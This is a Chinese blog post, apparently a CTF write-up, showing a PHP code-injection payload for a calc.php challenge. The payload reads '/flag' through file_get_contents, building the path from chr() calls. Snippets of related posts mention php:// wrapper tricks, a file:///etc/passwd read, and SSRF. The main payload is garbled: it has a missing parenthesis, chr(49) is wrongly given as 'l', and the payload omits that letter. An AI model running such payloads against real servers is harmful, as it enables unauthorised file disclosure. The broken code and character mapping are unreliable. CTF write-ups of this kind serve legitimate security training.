CTF-file_get_contents()

最新推荐文章于 2025-04-24 15:42:07 发布
最新推荐文章于 2025-04-24 15:42:07 发布
阅读量626 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/mr__sheng/article/details/132816401
文章探讨了在PHP代码中使用`file_get_contents`函数和`chr`函数对包含ASCII编码的payload进行处理,展示了如何解析并访问特定字符的URL路径。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 /calc.php?%20num=1;var_dump(file_get_contents(chr47).chr(102),chr(97),chr(103),chr(103)))

 其中的playload为ASCII码,对应如下:
//        chr(47)='/'
//        chr(102)='f'
//        chr(49)='l'
//        chr(97)='a'
//        chr(103)='g'
//        chr(103)='g'

 

 

xiukc
关注
20210218CTF伪协议绕过file_get_contents(bugkuctf的web21御结冰城感想)
qq_45290991的博客
02-18 1万+
CTF中常用的php伪协议利用 </h1> <div class="clear"></div> <div class="postBody"> file://# 作用: 用于访问文件(绝对路径、相对路径、网络路径) 示例: http://www.xx.com?file=file:///etc/passswd ph...
BugkuCTF-WEB题file_get_contents
am_03的博客
08-29 7202
知识点 empty() 函数用于检查一个变量是否为空。empty() 判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于 FALSE,那么它会被认为不存在。如果变量不存在的话,empty()并不会产生警告。 extract()函数从数组里将变量导入到当前的符号表。extract函数:可以进行变量覆盖。 语法:extract(array,extract_rules,prefix) 该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组里的各元素,将在当前符号表里创建对应的一个变量。第二
Bugku CTF_Web——file_get_contents
weixin_71914594的博客
10-27 637
看到file_get_contents就想到用php://input。Get传输ac再用fn读取数据。试了一下火狐的hackbar。一改Post就传输不过去。
CTFHub-file_get_contents
鸣蜩十四的博客
08-09 1733
extract() 方法可用于将数组展开,键名作为变量名,元素值为变量值,简单的说,就是能够直接将 $_POST 和 $_GET 中的变量解析出来,不需要我们手工赋值处理。 trim()去除字符串首尾处的空白字符 file_get_contents()将整个文件读入一个字符串 php://input可以访问请求的原始数据的只读流,在POST请求中访问POST的data部分,在enctype=“multipart/form-data” 的时候php://input 是无效的。 我们先对代码进行分析,而全部代.
CG CTF WEB file_get_contents
无限迭代中......
07-04 2694
http://chinalover.sinaapp.com/web23/ 题意:get一个file参数到file_get_contents()函数里,如果返回为指定字符串,就得到了flag。 <!--$file = $_GET['file']; if(@file_get_contents($file) == "meizijiu"){ echo $nctf; }--> 题...
CTF--file_get_contents
2401_83809941的博客
04-24 368
php://input: 允许访问请求的原始数据(POST 请求)允许将数据嵌入到 URL 中,通常用于内联数据( GET请求)php://filter: 允许对文件内容进行流式过滤。通过get方式传入,$ac和$fn相等才能返回flag。file_get_contents()函数。用于访问压缩文件中的内容。
CG-CTF web之 file_get_contents
热门推荐
silence1_的博客
05-15 1万+
CG-CTF web之 file_get_contents 题目: 题目为file_get_contents,是一个php函数 进入题目,什么也没有,查看F12查看源码,得到提示源码, 大概看一下代码,意思是get一个file参数到file_get_contents()函数里,如果返回为指定字符串,就得到了flag。 这里涉及到一个file_get_contents()函数,而这个函数是可以绕过...
两道CTF--FTP被动模式打php-fpm
unexpectedthing的博客
02-25 2091
文章目录[陇原战疫2021网络安全大赛]eaaasyphp考点思路总结解题先看phpinfo():我们先尝试写入shellFTP的被动模式打FastCGI蓝帽杯2021 One Pointer PHP考点php数组溢出命令执行拿webshell方法1:绕过open_basedir利用未授权打FPM RCE加载恶意so文件开启FTP服务器上传文件处理伪造恶意FastCGI请求流程SUID提权总结方法2:步骤:原理: [陇原战疫2021网络安全大赛]eaaasyphp 考点 反序列化–pop链的构成 F
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it
Anton__1的博客
05-12 3054
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it 看群里说CTFHub上复现了, 我来看看 本来想按照红帽杯的套路来试一下,发现phpinfo里莫得flag了 只能想想其他办法咯 <?php #Really easy... $file=fopen("flag.php","r") or die("Unable 2 open!"); $I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize(
CTF---web入门---php
Bad_Monkey的博客
09-19 943
不显示错误 @$a=trim(file_get_contents($b));//@表示 如果脚本中这句话出现的错误,不会将错误输出来 ini_set("display_errors", 0);//更改php.ini配置,错误不会显示 例如: test.php中代码如下 ini_set('display_errors', 0); include('hi.php'); 此时,如果 test.php有错...
PolarD&amp;N-CTF-web方向-困难_polard&amp;n 没人能拒绝猫猫 ctf(2)
2401_84263282的博客
05-04 780
横线中共20个字符,可以用四个phtml进行字符串逃逸,所以这样构造应该就能出答案了。那么我们构造payload:?passwd=;s:6:passwd;i:1;s:4:“sign”;然后就在源码中找到了flag。
CG CTF file_get_contents
qq_46389295的博客
02-24 1619
题目链接 <!--$file = $_GET['file']; if(@file_get_contents($file) == "meizijiu"){ echo $nctf; }--> file_get_contents存在变量覆盖漏洞
轻松通过file_get_contents题目(Bugku CTF
m0_63602484的博客
04-10 1768
a.这里需要打开burpsuite进行抓包,将抓取的数据包send to repeater,然后在重发器选项卡中进行编辑。b.只需要在GET/后面添加?ac=flag&fn=php://input,然后在数据包末尾添加flag即可。根据代码提示,这里我们构造php伪协议代码,并借助Burpsuite来修改数据包。c.最后发送请求,在右侧响应里面即可得到正确的flag。
CG CTF-Web-file_get_contents
feng的博客
09-08 1055
WP 进入环境后先发现什么都没有,我们f12查看源码,会发现代码,因此进行代码审计: <!--$file = $_GET['file']; if(@file_get_contents($file) == "meizijiu"){ echo $nctf; }--> 我们可以发现这题有一个file_get_contents函数。因为我们要get一个file,而且他的内容还要是meizijiu,我一开始想到了文件包含相关的内容,想到了php的一些伪协议。这时候我上网查file_get_con
CTF Web】Pikachu SSRF(file_get_content) Writeup(SSRF+读取文件)
HEX9CF的技术博客
10-16 643
其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据数据流:攻击者----->服务器---->目标地址根据后台使用的函数的不同,对应的影响和利用方法又有不一样PHP中下面函数的使用不当会导致SSRF:如果一定要通过后台服务器远程去对用户指定(“或者预埋在前端的请求”)的地址进行资源请求,则请做好目标地址的过滤。
file_get_contents 的使用
toume的博客
07-07 618
1,使用file_get_contents函数请求链接不会跳到请求的链接 return file_get_contents($url.'?'.$get);//$url是你要请求的连接,$get是你请求传过去的数据
开发安全之:file_get_contents()漏洞利用
dzqxwzoe的博客
08-09 811
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
第三节 file_get_contents()和fopen()模拟表单提交
千门公子襄
12-09 742
一.准备1.php<!DOCTYPE html> <html lang='en'> <head> <meta charset='UTF-8'> <title>表单提交</title> </head> <body> <form action='1.php' method='post'> <table> <tr>
CTF积累】两个绕过的题
qq_41369524的博客
12-10 1471
第一层绕过:===全等于让substr和md5函数同时报错,返回的就都是nul,从而实现全等于是传参传入数组形势:path[]=1接着第二层绕过:正则匹配^control$:以control开头且结束绕过方法:换行符%0a在结尾不会被识别从而第三层:看到 $getflag= file_get_contents( $b);
Warning: file_get_contents("hello ctf"): failed to open stream: No such file or directory in /var/www/html/index.php on line 10
最新发布
07-20
首先,用户的问题是关于PHP错误:"PHP Warning: file_get_contents failed to open stream: No such file or directory"。他们希望找到解决这个错误的方法。 从系统级指令来看: - 所有行内数学表达式必须使用$...$...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值